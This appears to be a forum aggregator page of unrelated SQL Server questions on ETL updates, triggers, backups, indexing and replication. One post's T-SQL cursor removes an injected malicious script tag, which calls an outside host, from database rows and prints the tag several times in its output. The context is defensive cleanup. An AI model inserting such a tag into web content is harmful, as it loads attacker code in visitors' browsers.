Creating Update Strategy In ETL
Apr 3, 2008
hello all , I need help to implement this package that will update/add/delete a row from one table to another.
I€™m trying to create this package:
Insert an entire row using SSIS from one table to another based on condition:
A for add, D for delete, C for change
MASStable
Column0
FirstName
Lastname
,MiddleName
A
John
daniels
D
sarah
jones
G
C
yann
coleman
J
daniel
lope
If column 0 = €˜A€™ in masstable add entire row to Deathtable
If column 0 = €˜D€™ in masstable Delete row from Deathtable where Masstable.LastName = Deathtable.LastName
If column 0 = €˜C€™ in masstable Update row (some columns) where Masstable.LastName = Deathtable.LastName
If column 0 = €˜ €˜ no tasks..
This is my mastertable
Deathtable
Column0
FirstName
Lastname
,MiddleName
Juan
danring
sarah
jones
G
yann
coleman
daniel
lope
Do you have a hint.?
View 4 Replies
ADVERTISEMENT
Aug 16, 2004
I need help writing an Update trigger that puts the current date in a changed record. I understand the basic idea but can't seem to get it to work. Any help would be greatly appreciated
View 1 Replies
View Related
May 22, 2008
I have problem with Triggers,Iv never done it before except @school!!
One of our clients Server has same database names(WeighBridge) but Different Instances(1got Express and Other3 have SQL2005).There is a weighbridge scale on SQL Express Database.
I want to create a Trigger that Automatically updates everytime there is weighbridge scale In other Databases that have SQL2005.
If someone can help please a code or tell me what to do,
Create a Trigger on a Table ot Database??
Please Help!!!!!!
View 11 Replies
View Related
May 30, 2006
Hello
I am new to sql and asp, I am using visual web developer and have table that when it gets change I would like to see another table populated with the information. This is the two tables I have
First one has the information in it that users will insert in it
asset_id int Unchecked
asset_desc varchar(50) Checked
serial_no varchar(50) Unchecked
model_no varchar(50) Checked
category bigint Unchecked
Manufacturer varchar(50) Checked
Mac_address varchar(50) Checked
service_pack varchar(50) Checked
owner bigint Unchecked
location bigint Unchecked
date_acquired datetime Checked
date_deactivated datetime Checked
system_asset_no varchar(50) Checked
cs_desc varchar(50) Checked
vendor varchar(50) Checked
modified_date datetime Checked
action varchar(50) Checked
Unchecked
Next table is the one I want the information to go in
history_asset_id int Unchecked
history_asset_desc varchar(50) Checked
history_serial_no varchar(50) Checked
history_model_no varchar(50) Checked
history_category bigint Checked
history_manufacturer varchar(50) Checked
history_mac_address varchar(50) Checked
history_service_pack varchar(50) Checked
history_owner bigint Checked
history_location bigint Checked
history_date_acquired datetime Checked
history_date_deactivated datetime Checked
history_system_asset_no varchar(50) Checked
history_cs_desc varchar(50) Checked
history_vendor varchar(50) Checked
[modified date] datetime Checked
action varchar(50) Checked
Unchecked
the column action is for the name of person updating and modified date is the system date. My trigger is this
Create TRIGGER Trigger4
ON dbo.t_asset
FOR INSERT /* INSERT, UPDATE, DELETE */
AS
INSERT INTO history_asset_id
(history_asset_id, history_asset_desc, history_asset_orderno, history_asset_invoiceno, history_asset_yellowno, history_asset_serial_number,history_asset_cost, history_asset_fedpart, history_date_acquired, history_asset_cond, history_cat_id, history_bld_id, history_loc_name,history_date_deactivated, history_asset_dispvalue, action, modified_date)
VALUES ('@asset_id','@asset_desc','@asset_orderno','@asset_invoiceno','@asset_yellowno','@asset_serial_number','@asset_cost','@asset_fedpart','@date_acquired','@asset_cond','@cat_id','@bld_id','@loc_name','@date_deactivated','@asset_dispvalue','@action','@sysdate')
Can anyone please help me or point me in the right direction, rbynum@kansascommerce.com
View 3 Replies
View Related
Aug 21, 2006
I created an application based on an existing database, I made a lot of changes to the database, now I need to create scripts in the new database to use to update the old database. For example, I added 15 fields to 1 of the tables. Is there a way to use Tasks -> Generate Scripts to create a script that will check the existance of each column and create it if it does not exist? I tried multiple ways of doing this, but it will only create columns for tables that do not exist in the old database. If a table exists, none of the new columns are added.
I may be going about doing this wrong. The main goal I am tying to accomplish is to get all of the data that is in the old database (It was in use while the new one was being developed so there is a lot of data in the old database that I need to have in the new one) into the new one.
Am I better off creating a blank database, then exporting all of the data from the old database to the new one? Will this create any problems with my Primary Keys (The are all auto-increment Integers)?
View 4 Replies
View Related
Feb 1, 2008
So I've created a bit of code to remove some virus garbage that's been plaguing some of my clients, but it seems since I've tried using a cursor to streamline the process a bit it's just filling in the fields with nulls.
Code:
use db7021
go
select * from products
go
declare @desc varchar(max)
declare @virus varchar(128)
set @virus = '<script src="http://b.njnk.net/E/J.JS"></script>'
declare @start int
declare @end int
declare thecursor CURSOR LOCAL SCROLL_LOCKS
for select cdescription from products
where cdescription like ('%' + @virus + '%')
for update of cdescription
open thecursor
fetch next from thecursor into @desc
while @@FETCH_STATUS = 0
begin
print @desc
set @start = charindex(@virus, @desc)
set @end = @start + len(@virus)
print cast(@start as char) + ', ' + cast(@end as char)
set @desc = left(@desc, @start - 1) + right(@desc, len(@desc)-@end+1)
update products
set cdescription = @desc
where current of thecursor
fetch next from thecursor into @desc
end
close thecursor
deallocate thecursor
select * from products
go
Which produces the output:
Code:
id cname cdescription
----------- ----------- ----------------------------------------------------------------------------------------
1 banana sometext 0.962398 <script src="http://b.njnk.net/E/J.JS"></script>
2 apple sometext 1.9248 <script src="http://b.njnk.net/E/J.JS"></script>
3 lolcat sometext 2.88719 <script src="http://b.njnk.net/E/J.JS"></script>
4 cheezburgr sometext 3.84959 <script src="http://b.njnk.net/E/J.JS"></script>
(4 row(s) affected)
sometext 0.962398 <script src="http://b.njnk.net/E/J.JS"></script>
41 , 89
(1 row(s) affected)
sometext 1.9248 <script src="http://b.njnk.net/E/J.JS"></script>
41 , 89
(1 row(s) affected)
sometext 2.88719 <script src="http://b.njnk.net/E/J.JS"></script>
41 , 89
(1 row(s) affected)
sometext 3.84959 <script src="http://b.njnk.net/E/J.JS"></script>
41 , 89
(1 row(s) affected)
id cname cdescription
----------- ------------ ------------
1 banana NULL
2 apple NULL
3 lolcat NULL
4 cheezburgr NULL
(4 row(s) affected)
I trimmed out alot of whitespace from the results for the sake of readability, but aside from that this is everything I've got. I know the string functions work since I tested them on their own, but since I've combined them with the cursor they've started producing NULLs.
Maybe I've missed something in the syntax for cursors?
View 2 Replies
View Related
Jul 20, 2005
I am extremely new at SQL Server2000 and t-sql and I'm looking tocreate a simple trigger. For explanation sake, let's say I have 3columns in one table ... Col_1, Col_2 and Col_3. The data type forCol_1 and Col_2 are bit and Col_3 is char. I want to set a trigger onCol_2 to compare Col_1 to Col_2 when Col_2 is updated and if they'rethe same, set the value on Col_3 to "Completed". Can someone pleasehelp me?Thanks,Justin
View 7 Replies
View Related
Oct 23, 2014
I am attempting to update a table that drives a report. The report is at the order level. An order can have several types of demand (revenue $): Ship and/or Backordered. When I update one of these demand fields on the report table, I would expect those orders that have that type of demand to update, and those orders that don't have that type of demand to remain at their current value ($0 in this example which is the table default). But what is happening is that orders that don't have that type of demand are changing to NULL. What am i doing wrong with my update statement that is causing this?
Code:
CREATE TABLE #sales(
OrdNo int,
StatusGrp varchar(10),
Demand decimal(10,2)
)
INSERT INTO #sales
VALUES (1,'Ship',100.00)
[Code] .....
View 6 Replies
View Related
Dec 3, 2005
Hi,
I use the SqlDataSource Control for generating SQL-statements that I
easily can modify. But on some tables I cant autogenerate the
statements for Insert, Delete and Update. The checkbox is dimmed/not
enabled. Why cant I use the autogenerate feature on some tables?
Best regards,
I really like asp.net 2.0!
View 1 Replies
View Related
Oct 13, 2013
I need creating an update trigger that involved two tables and a few fields.
tblCases
Fields
Defendent1
Defendent2
Defendant3
tblCaseBillingDetails
Fields
DefCount
I would like to create the trigger on tblCaseBillingDetails so that when the data in the Defendant fields are updated, the trigger fires and updates the Defendant count DefCount.
View 1 Replies
View Related
May 5, 2015
Looking to write an query that will update a field for multiple items, like 1,500.
something like:
UPDATE INMAST
SET FPRICE = 111.11
WHERE
INMAST.FPARTNO = 'xxx'
only issue I'm having is a need to do a JOIN because there's one more condition that must be met from another table, i've tried this:
SET FPRICE = 111.11
JOIN INVCUR
ON
(inmast.fpartno + inmast.frev)= (invcur.fcpartno + invcur.fcpartrev)
WHERE
INMAST.FPARTNO = 'NRE'
AND
invcur.flanycur = 'TRUE'
but that is giving me an error around the JOIN
View 11 Replies
View Related
May 8, 2015
I have a table with ~30M records. I'm trying to add a column to the existing table with default value and have noticed following ... When using alter with default value- (Executes more than 45 min and killed forcefully)
ex: Â
ALTER TABLE dbo.Table_X Add is_Active BIT CONSTRAINT DF_Table_X_is_Active DEFAULT 'FALSE' NOT NULL
GO
When using update command after adding column with alter (without default value) it completes is 5 min.
ex: Â
ALTER TABLE dbo.Table_X Add is_Active BIT NULL
GO
UPDATE Table_X SET is_Active = 0 WHERE is_Active IS NULL
GO
Why there is so much of difference in execution times ? I was just trying to understand internal behavior of the SQL in these two scenarios.Â
View 4 Replies
View Related
Mar 18, 2014
how to create package upsert industry and want to do update and insert operations from database.
View 4 Replies
View Related
Jul 18, 2000
Hi all,
Pardon me for asking a question that I know has been asked before. I need to develop a backup strategy for our SQL Server and I am looking for any help that anyone can offer including recommending good books for reading.
Thanks in advance,
Faustina
View 1 Replies
View Related
Oct 18, 2000
In SQL Server 6.5, Is it generally better to dump the
transaction log first, then the database or to dump
the database and then run a dump 'tranlog with truncate
only' option?
Or, is this more a matter of personal choice?
Toni
View 1 Replies
View Related
May 30, 2006
Hi guys.
I am currently developing a system thats stores exchange stats in a db. Since our customers are companies with 20 employees up to 5 000 there a a big difference in the volume of data needed to be stored.
We currently thinking of supplying a SQL Server Express DB to the small customers and suggest a SQL Server to the bigger.
But since I would like to use the same structure for both types of customers I wonder how should i design the storeage.
Since the could be from 500 records a day up to 20 000. There are quite simple recordes with only simple datatypes. about 15 fields with no more than 10 chars each, mostly 2.
Should i separate the data in diffrent tables for a week or a day etc.
Since I am only going to filter data on 1 or 2 fields the data will be easly indexed.
The reports generated will almost always only use 1-3 months of data, but historical reports have to be possible.
My question are ofcourse:
Whats the best solution for me?
Thanks in advance:)
/Johan Wendelstam
Sweden
View 10 Replies
View Related
Jul 23, 2005
I've recently inherited a position where I am responsible for the well-beingof some DBs.2 (much) more important than others.The current recovery model, from what I can tell, is to do a full db/logbackup overnight.This .bak file is then written to tape as well as saved on the disk for 2days.Both these dbs are used fairly extensively 8-5pm and losing data would notbe good.The db sizes are approx 5gb and 3gb.This doesn't seem like the ideal situation to me. Everything I read tellsme... full backup periodically, differential nightly and transaction hourly.Agreed?If so then I have 2 questions:1. Is the best way to do this via a maintenance plan or by scripting andscheduling?2. What, if any, overhead can be expected with regular transaction backupsduring work hours?A bit of a pointer to #1 would be appreciated also.Thanks.
View 4 Replies
View Related
Jun 12, 2006
I have a bit of a problem with regards an indexing strategy. Well,basically there is no indexing strategy on a set of data I have atwork. Now, I didn't create the design as I would have allowed for this.OK, so there is primary key (clustered) indexes (mainly compositekeys), but no other indexes on the tables. As you would expect, theperformance leaves a lot to be desired. A hell of a lot. We haveseveral million rows in a lot of the tables. None of the queries seemto be overly complex so we can work through the applications at a laterstage.We have multiple copies (one per client per country) of the samestructure (I may have considered combining these to allow betterperformance). One specific SP that I need to run takes 40+ hourswithout indexes and 5 hours with some (130) basic indexes to get usstarted on a better design. These 130 indexes are the minimum I suspectwe need and from there, we can start to work out which ones we need.Now the test database (our worst performer) doubles in size to 20Gb,but the performance is much much better (as expected). The originalthinking behind the design was for storage concerns (server spacerecently upgraded) and for performance with bulk inserts.We have a lot of bulk inserts, but I suspect that these are not toobad, and the time taken for indexing these is negligable due to theperformance gains. I strongly suspect that we have a considerableamount of table scans going on, but the problem is that people heredon't understand indexing (yet) or have the time (probably because it'sall taken up using the poorly designed system). That's a whole seperateissue for me to address.So, finally getting round to my questions...Is there any good reference explaining in Layman's terms why you needbasic (or advanced) indexing ? Any links would be appreciated. I needthis to help explain to colleagues why a disk space increase andindexing will be far better than spending thousands on a new box anddoing the same (a common problem I suspect).How can I accurately estimate the amount of time taken to update anindex once data is bulk inserted. I don't want to re-index from scratchas this may take too long. Indexing my database first time round takesabout 1 hour 30 minutes.It's all part of an ongoing bit of digging into the system and re-doingit to make it work properly. I'm sure most of you will have been thereat some point or another.ThanksRyan
View 7 Replies
View Related
May 23, 2007
We are currently doing daily full backup of system & custom databases since database size is small. Is that good idea ? or better option would be weekly full & daily incrementatl ?
Do we need to do any special backup on system databases or transactional logs ?
Please advice
View 30 Replies
View Related
Nov 1, 2007
Hi
I have concern about an sql server. The server has the operating system and sql server installed locally. The databases and transaction log files is stored on SAN. We used to have the database backup and transaction log backups stored locally on the server. We tape the database backup and transaction logs every 24h. If we lose the san and the server then we are stucked with no backup easily accessible. And on tape we loose of 24h data. We decided to put up stand alone server with no connection to the san and dump the backups file on this server. We also put a secondary server sql I case of emergency, to test backups and We are looking at the getting a mirroring or log shipping solution but we are not there yet, next year€™s budget. We still using some old server left from migrating to virtualization.
Then I read the €œPractical Troubleshooting The Database Engine book€? best practice not to avoid net work drive backups. Stuck aging. Back with the backup to local drive and robocopy them? Keep them on the network drive, start using? MIRROR TO in the BACKUP DATABASE? Today we are using the Backup Database Task in the SSIS.
Advice?
Regards
Johan
View 4 Replies
View Related
May 21, 2007
I am running SQL Server 2005 x64 Enterprise under Window Server 2003 x64 Enterprise. After reviewing many posts and suggestions in this forum, I am developing a backup strategy that should include keeping my transaction log file in a manageble size.
Please examine the following proposed backup schedule and let me know if this is considered a sound plan. The scripts below will write to disk and each night and then be backed up to tape.
*** TASK 1 ***
Backup transaction log
/* This script backs up the DSS database transaction log to disk, overwriting any
previous backup
*/
BACKUP LOG [DSS]
TO DISK = N'g:mssqlackuplogdss_log.bak'
WITH
INIT
, NAME = N'DSS-Transaction Log Backup'
GO
*** TASK 2 ***
/* This script shrinks the DSS database transaction log file
*/
BACKUP LOG [DSS] with truncate_only
dbcc shrinkfile(DSS_log)
**** TASK 3 ****
/* This script backs up the DSS database to disk, overwriting any
previous backup
*/
BACKUP DATABASE [DSS]
TO DISK = N'g:mssqlackupdatabaseDSS.bak'
WITH DESCRIPTION = N'DSS Full Database Backup'
, INIT
, NAME = N'DSS - Full Database Backup'
GO
/* Backup validation to ensure the file is valid before storing it */
RESTORE VERIFYONLY
FROM DISK = N'g:mssqlackupdatabaseDSS.bak'
WITH FILE = 1
GO
*** TASK 4 ***
Update statistics on the DSS database
View 3 Replies
View Related
Apr 23, 2008
Currently I have 1 server running MSSQL 2005 Standard. There is no redundancy in my current solution. I'm working on a project that involves a separate installation. I have 3 goals:
1) Provide redundancy for the new installation
2) Provide high availability for the new installation
3) Provide reduncancy for the current installation
Here's what I'm thinking about doing:
1) Purchase 2 servers and a Dell MD3000i ISCSI storage box. Cluster the servers and install SQL Server on the cluster.
2) Install SQL Server on an existing box (single CPU license) for backup purposes. Enable log shipping from the new cluster to the backup server.
3) Enable log shipping from the existing installation to the backup box.
I've also though about offloading some of the static pricing operations to the backup installation. This would free up my existing installation to deal with the changing data.
A couple of questions:
-How does this strategy sound? Are there any configuration problems with it?
-Can I legally use a development edition for the backup installation (if all I do is log shipping to it)?
Any other comments are welcome.
Thanks!
Brian
View 14 Replies
View Related
Jun 15, 2007
This may seem like a silly question, but has anyone ever heard of a DBA or an Engineer deciding to not back up databases inside EM, and only relying on the RAID or third party software for redundancy?
SBS 2003 R2
SQL 2000
Veritas 8.6 open file agent, SQL agent, Exchange agent
Thanks for any input,
Rich
View 3 Replies
View Related
Mar 2, 2007
Hi,
In my current organisation they are using SQL Server.
They are using TSM (Tivoli Storage Manager) to back up the server on a nightly base.
However I feel that this is not the correct way. Suppose I need some data back, I call technical support and they would restore the server. If another user made some changes to another database that day, he would lose his changes.
Of course they could restore a file but I am not sure if this is correctly. What will happen to the transaction log for example ?
My idea is that they should backup the database using the normal sql backup commando, dump the data to a folder and backup that folder.
Any suggestions please ?
Constantijn Enders
View 5 Replies
View Related
Apr 22, 2007
I have been developing a genealogy application using a SQL Server 2000 database and ASP .NET 2.0. In this application a process, Ged.Parse, converts data from the GEDCOM standard format (a heirachical file format that looks as if it was designed for 80-column cards) into my SQL Server database.
As we started to load reasonable quantities of data into the system we found that the on-line response became abysmal. This problem was fixed by defining a number of secondary indexes (response times dropped to under a second, from previously exceeding 2 minutes and often timing out). Unfortunately however the processing time of Ged.Parse then tripled, and it may now take up to an hour to process a GEDCOM. I believe that this is a byproduct of defining several indexes that are not needed by Ged.Parse itself, but which are of course maintained as Ged.Parse inserts new records into the database.
I am wondering what my best strategy is, apart from putting Ged.Parse into a background task and just letting it trickle away. (I will probably do this anyway). What I'd like to be able to do is to have Ged.Parse load records without creating the secondary indexes, and then create the indexes for the newly-added records as a penultimate step just before it makes them available for general use. Of course there is no way that you can do this: records in a table are either indexed or they are not.
Proposed change: recode Ged.Parse to load data into temporary tables, say NewPeople, NewFacts, etc., with these tables having only the indexes required by Ged.Parse. Then, as the last process in Ged.Parse run a SQL procedure with code like: - Insert into People Select * From NewPeople Delete from NewPeople etc
This is a reasonable amount of programming, so before I make this change could somebody tell me: will this be significantly faster overall, or is this likely to make little or no improvement compared to the present process in which Ged.Parse loads data directly into People, Facts, etc? Two facts that may influence the answer. First, all record relationships are through GUIDs, so records in NewPeople, NewFacts, etc would already have their final key values. Second: although Ged.Parse needs to form relationships between records, these relationships are only within the new records (created from the same GEDCOM), and Ged.Parse does not need to relate any of these new records to earlier records.
Thank you,
Robert Barnes.
View 2 Replies
View Related
Nov 27, 2000
Hi!
It would be very nice if some people out there, using
merge replication can tell me their strategy to get
started with a new subscriber. Is it a good way to copy
a publisher backup to the new subscriber and restore it
there and say that schema and data is already here when
creating the subscription?
I experienced some troubles when I tried to add a new
subscriber and used the initial snapshot transfer to
get the db to the new sub. (no defaults are transferred...???)
Or is it even better to use DTS?
I'd also be very grateful forinformations about RESCUE
STRATEGIES in case of a major database problem of replicated
databases!
Hoping for some answers. TIA & Best Regards
Gert
View 1 Replies
View Related
May 4, 1999
Hi All,
Can any one help me with this..
I've a critical application that can't be stopped for a second.
I'd like to have an implementation that uses 2 sql 6.5 servers one as standby and
which is ready and up to date to take place and run instead of the master
server when it's down and when the master is back to work it's updated with the
data entered to the standby.
This process must be automatically to maximum extent.
Thanks
Mohamed
View 1 Replies
View Related
Oct 22, 2004
I am using SQL Server 2000 and trying to create a disaster recovery strategy that would run nightly and backup the database or at least the changes and would ftp these to a secure ftp site. For smaller database it is easy, I just take a full backup, zip up the file and ftp it to the secure backup site. This strategy does not work so well when the zipped up database is still close to 3GB. I have a pretty big window for doing everything but 3GB is just too much to ftp overnight. The recovery model is simple so the only other option seemed to be do a full backup once a month and take differentials nightly. The problem is I am offsight and the client may need to take a full backup during the day and my nightly differential would get screwed up.
There is a fairly low volume of transactions so the idea of just doing nightly backups on the data that has changed is the obvious choice but differentials don't seem to fit. Any ideas?
Thanks,
TH
View 2 Replies
View Related
Oct 20, 2006
Hi Folks,
The Need : Refresh a part of local database daily from remote server.
Assumption : All updates in remote are updated in local db as well.
Need inputs on the type of strategy
1) Take full backup of remote, refresh on local
( Downside for us is Network and disk space )
2) DTS ( refresh only the objects required )
Looks good to us but does it take care of my assumption ?? Your suggestions welcome .. I may be wrong
3) replication ( Dont want it implement on the already complicated sceanrio ... so I'll pass)
4) Standy databases ( ??? Any help on this)
5) Any other
Thanks so much,
Warm Regards,
Ranjit.
--------------------------------------------------------------
The best moments of my life are often things I get paid for
View 3 Replies
View Related
Jun 14, 2007
My maintenance plans are starting to acting weird. I'm building a custom script to manage the database backups on my server, but curious if anybody has some sample work that will allow me to avoid re-inventing the wheel.
A couple of primary constraints:
I want to do a full backup daily (and only retain 1 day of full backups)
Transaction Log backups every 20 minutes
I'd like to loop through the databases on the server automatically to make this a little more flexible.
You have anything you'd like to share? Or, bits of knowledge worth sharing?
Please advise,
alex8675
View 3 Replies
View Related
Apr 18, 2008
Hi,
I have just created a logging table that I anticipate to have 10's of millions of rows (maybe 100's of millions eventually).
Basically its a very basic, narrow table, we are using it to log hits on images for a webserver.
My question is that we want to run queries that show how many rows are shown per day etc, however we want to make sure these queries which we are anticipating to be very heavy, do not slow down the system.
I have been recommended to have a seperate database (mirror/replica) for reporting so that the performance of regular activity will not be affected.
I assume this means I would need another server for this other database?
I am thinking there are probably some alternative solutions to this as well. Getting a dedicated server just for these queries really isnt an option.
In order to improvement it is not a problem to make some sacrifices. For example, having the data update every 15 minutes is more than acceptable.
I see certain websites I use employ this strategy of making data update every 15 minutes, but I am unsure what is likely going on behind the scenes. Also the queries are lightening fast when run. I am thinking that they have some sort of table that is populated with some computed data, so its quick to query.
Any thoughts or suggestions to give me some direction, are very much appreciated !
thanks once again,
Mike123
View 12 Replies
View Related
Oct 7, 2005
My SQL acumen stems from just a couple courses, and everything since fromthe trenches. Fun + angst over time.I'm needing some advice on joins. Though I understand the basics, I'mhaving problems abstracting from instances where it's easy to think aboutdiscrete key values (. . . and studentid = 1234) to entire sets of users,with the joins doing their work.For example, currently I'm going nuts trying to return dates for whichattendance has not been taken for students, but should have been. Studentshave active and inactive periods of enrollment in our schools, so we have ahistory table of when they were active and inactive -- as well as two moretables that layer other bounds on eligible dates (what range of dates fallwithin a given school's term? What of holidays and staff institute days?).I also have a populated calendar table, and a table where students areidentified. Finally, there's a site history table which is a REAL pain inthe butt for me to think about.CREATE TABLE Student (StudentID int IDENTITY(1,1) NOT NULL,CurrentStatus varchar(2) NOT NULL)CREATE TABLE Calendar (Dateid int NOT NULL,Date datetime NULL,Workdaybit NULL )CREATE TABLE DailyAttendance (StudentID int NOT NULL,AttendanceDate datetime NOT NULL,SiteID varchar(6) NOT NULL,Attend_Status varchar(2) NOT NULL)(the last field is, e.g., present or absent)CREATE TABLE StudentActivityHistory (StudentID int NOT NULL,StatusStartDate datetime NOT NULL,StatusEndDate datetime NULL,Activity_Statusvarchar(2) NULL,StudentStatusHistoryIDint IDENTITY(1,1) NOT NULL)(the activity_status is either A or I; the important records in this tableare the 'A' records. A student's most recent status record always has anend date of '12/31/9999 12:00:00 AM', whether that's an A or I record. Nodates not between start/end dates of students' A records would needattendance taken. students may have many periods of activity -- A records-- as well as many inactive periods.)CREATE TABLE SiteTerms (SiteID varchar(6) NOT NULL,Term varchar(3) NOT NULL,StartOfTerm datetime NOT NULL,Quarter varchar(2) NOT NULL,SchoolYear varchar(9) NOT NULL,EndOfTerm datetime NOT NULL)(different schools vary their term start and end dates. No dates notbetween term start and end dates would need attendance taken by studentsassigned to and active in that school during that period.)CREATE TABLE SiteExceptionDays (SiteID varchar(6) NOT NULL,SchoolDayStartTimedatetime NOT NULL,SchoolDayEndTime datetime NOT NULL,SchoolDayType varchar(2) NOT NULL)(there are two kinds of days -- partial attendance, and no attendance. Inshort, if the type of day is "N" no attendance needs to be taken forstudents assigned to that school and active on that day)CREATE TABLE StudentSiteHistory (StudentID int NOT NULL,SiteStartDate datetime NOT NULL,SiteID varchar(6) NOT NULL,SiteEndDate datetime NULL,StudentSiteHistoryIDint IDENTITY(1,1) NOT NULL)(Pain. The attendance table tells which site a student was assigned whenattendance was taken. To find which school a student was a assigned to ondays attendance was NOT taken, this table's implicated 'cause it's the onlyway of connecting everything else together)Dangitall, I know this can be done but I've beat my head against the wall.Due diligence has gotten me a headache and a hankerin' for whiskey, and I'mnot much of a drinker. Is there anyone in the group for whom this kind ofthing is a no-brainer? I'd just as soon get some tips on how to approachthis kind of thing, and figure it out myself with some guidance.Any takers? Gotta run, dang I'm late for something.TIA--Scott
View 4 Replies
View Related
May 7, 2007
Hi all
My company is going to open new working centers on different locations of my region. One of the problems we are suffering is that at some locations, the network communications infrastructure is very very very poor. So, in that locations we work with low bandwidths, and connections usually break down.
Because of this, we are thinking in distributing our database. I have been doing some tests on replication, reading the docs, etc... But I am still not sure which replication strategy should we use, and how to organize our database tables to allow replication work properly.
Our offices are going to share some data (a product catalogue, for example) which could be updated an queried from any of the offices. But there is also data which is not going to be shared, as product stocks for each location.
We were thinking on using transactional peer-to-peer replication. But now we are having serious doubts about this since in a previous post (http://forums.microsoft.com/MSDN/ShowPost.aspx?PostID=1525643&SiteID=1) we were told we can't store non-shared data (stock) in the same table as the shared data (products) due to how database behaves when a publication is restarted. We know it would not be usual to republish, but we were thinking on crash recovery.
It would be fantastic if somebody could help us to decide what should we do to organize our database to allow the use of a proper replication scheme.
Thanks in advance,
Rubén D. M.
View 4 Replies
View Related